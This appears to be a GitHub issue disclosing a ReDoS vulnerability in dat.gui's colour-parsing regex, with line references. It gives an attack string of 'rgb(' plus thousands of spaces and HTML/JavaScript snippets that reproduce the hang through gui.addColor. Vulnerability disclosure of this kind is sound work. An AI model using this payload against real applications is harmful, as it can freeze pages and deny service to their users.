Regular Expression Denial of Service (ReDoS) in dat.gui
yetingli opened this issue · 0 comments
yetingli commented
Type of Issue
Potential Regex Denial of Service (ReDoS)
Description
The vulnerable regular expression is located in
dat.gui/src/dat/color/interpret.js
Line 61 in 51d1a37
dat.gui/src/dat/color/interpret.js
Line 79 in 51d1a37
The ReDOS vulnerability of the regex is mainly due to the sub-pattern \s*(.+)\s* and can be exploited with the following string
"rgb("+" " * 5000
You can execute the following code to reproduce ReDos
<script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
var gui = new dat.gui.GUI();
var Options = function() {
this.color0 = "rgb( "; // CSS string
};
window.onload = function() {
var options = new Options();
gui.addColor(options, 'color0');
};
</script><script type="text/javascript" src="build/dat.gui.js"></script>
<script type="text/javascript">
var gui = new dat.gui.GUI();
var Options = function() {
this.color0 = "rgba( "; // CSS string
};
window.onload = function() {
var options = new Options();
gui.addColor(options, 'color0');
};
</script>